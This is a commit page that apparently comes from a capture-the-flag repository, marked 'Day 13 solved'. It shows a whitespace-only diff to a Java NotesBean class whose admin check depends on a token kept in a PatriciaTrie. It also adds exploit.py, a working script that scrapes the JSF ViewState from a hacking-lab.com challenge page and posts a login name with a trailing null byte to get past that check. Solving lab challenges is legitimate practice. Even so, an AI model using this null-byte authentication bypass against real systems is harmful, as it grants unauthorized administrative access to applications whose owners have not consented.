Day 13 solved
This commit is contained in:
parent
f36aa42aa9
commit
97efd59a23
@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils;
|
|||||||
public class NotesBean implements Serializable {
|
public class NotesBean implements Serializable {
|
||||||
|
|
||||||
/**
|
/**
|
||||||
*
|
*
|
||||||
*/
|
*/
|
||||||
private PatriciaTrie<Integer> trie = init();
|
private PatriciaTrie<Integer> trie = init();
|
||||||
private static final long serialVersionUID = 1L;
|
private static final long serialVersionUID = 1L;
|
||||||
@ -42,18 +42,20 @@ public class NotesBean implements Serializable {
|
|||||||
public void setTrie(String note) {
|
public void setTrie(String note) {
|
||||||
trie.put(unescapeJava(note), 0);
|
trie.put(unescapeJava(note), 0);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private static PatriciaTrie<Integer> init(){
|
||||||
|
PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
|
||||||
|
trie.put(securitytoken,0);
|
||||||
|
|
||||||
private static PatriciaTrie<Integer> init(){
|
return trie;
|
||||||
PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
|
}
|
||||||
trie.put(securitytoken,0);
|
|
||||||
return trie;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static boolean isAdmin(PatriciaTrie<Integer> trie){
|
private static boolean isAdmin(PatriciaTrie<Integer> trie){
|
||||||
return !trie.containsKey(securitytoken);
|
return !trie.containsKey(securitytoken);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private static InputStream getStreamFromResourcesFolder(String filePath) {
|
||||||
|
return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
|
||||||
|
}
|
||||||
|
|
||||||
private static InputStream getStreamFromResourcesFolder(String filePath) {
|
|
||||||
return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
34
Day 13/exploit.py
Normal file
34
Day 13/exploit.py
Normal file
@ -0,0 +1,34 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
from bs4 import BeautifulSoup as bs
|
||||||
|
|
||||||
|
URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
|
||||||
|
|
||||||
|
session = requests.session()
|
||||||
|
|
||||||
|
# Get view state
|
||||||
|
response = session.get(URL)
|
||||||
|
if response.status_code != 200:
|
||||||
|
print("Server returned %d %s" % (response.status_code, response.reason))
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
html = bs(response.text, 'lxml')
|
||||||
|
viewState = html.find("input", { "id": "javax.faces.ViewState" })
|
||||||
|
if viewState is None:
|
||||||
|
print("Could not find javax.faces.ViewState")
|
||||||
|
exit(2)
|
||||||
|
|
||||||
|
params = {
|
||||||
|
"j_idt14": "j_idt14",
|
||||||
|
"j_idt14:j_idt15": "login",
|
||||||
|
"j_idt14:name": "auth_token_4835989\0",
|
||||||
|
"javax.faces.ViewState": viewState['value']
|
||||||
|
}
|
||||||
|
|
||||||
|
response = session.post(URL, data=params)
|
||||||
|
if response.status_code != 200:
|
||||||
|
print("Server returned %d %s" % (response.status_code, response.reason))
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
print(response.text)
|
Loading…
Reference in New Issue
Block a user